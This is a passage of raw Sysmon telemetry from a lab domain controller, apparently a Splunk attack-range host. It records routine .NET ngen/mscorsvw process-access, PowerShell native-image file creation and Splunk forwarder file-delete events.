:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.743{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A403-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.743{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A403-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:17.712{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19dc-0\Microsoft.PowerShell.ISECommon.dll2021-06-23 21:04:17.712 10341000x800000000000000020644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.665{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.650{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.650{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A303-00000000CF01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.603{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A203-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.587{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A203-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.587{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A203-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.587{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B395FDABCFF5A72185FA7569A18058D,SHA256=2CAFAEFA5408946E10E08922090DD498E59560BCD4C296B21194554190753149,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:17.540{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ac4-0\Microsoft.PowerShell.GraphicalHost.dll2021-06-23 21:04:17.540 23542300x800000000000000020636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.462{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA43E899C6A73BB85DEC1469A3A9486A,SHA256=4C4FD4BC1A017FFD8EF09D088C872F25F7CBE48D6DCE3EAB5981A4D884D24612,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.978{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D2-60D3-A603-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.822{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D2-60D3-A603-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.822{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D2-60D3-A603-00000000CF01}6912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:18.759{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\830-0\Microsoft.PowerShell.Management.Activities.dll2021-06-23 21:04:18.759 23542300x800000000000000020653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.603{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=784B7E4E5CF56388CDB1FFA14575BBC8,SHA256=3107B116FB8CA831F55D7A0422668231C9BFCF4B0AAE16B62F59C1C456F5848D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D3F62B6617F8A82733013EC2D8EA70,SHA256=21F2C8B7C44AA00CCB29690E22BD17ED0282AE3266C7525A64DA70EA2AA1957B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.837{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D8CBC766A98E792C1ADB900074502BA,SHA256=614C014FB9648E90ABEF06C9C0B9DAA4E3E5CA5BA8CB4BF76D029FE37D43BE31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.775{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.759{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.759{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.696{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-AA03-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.681{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-AA03-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.681{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-AA03-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:19.650{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a3c-0\Microsoft.PowerShell.Security.dll2021-06-23 21:04:19.650 23542300x800000000000000020669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.478{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B53BB20BE6013E35F08160BAF55293,SHA256=E14051FF9CB1B363BEF9B6640C0B31371215D2F942CD09758B9565D0CB140E8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 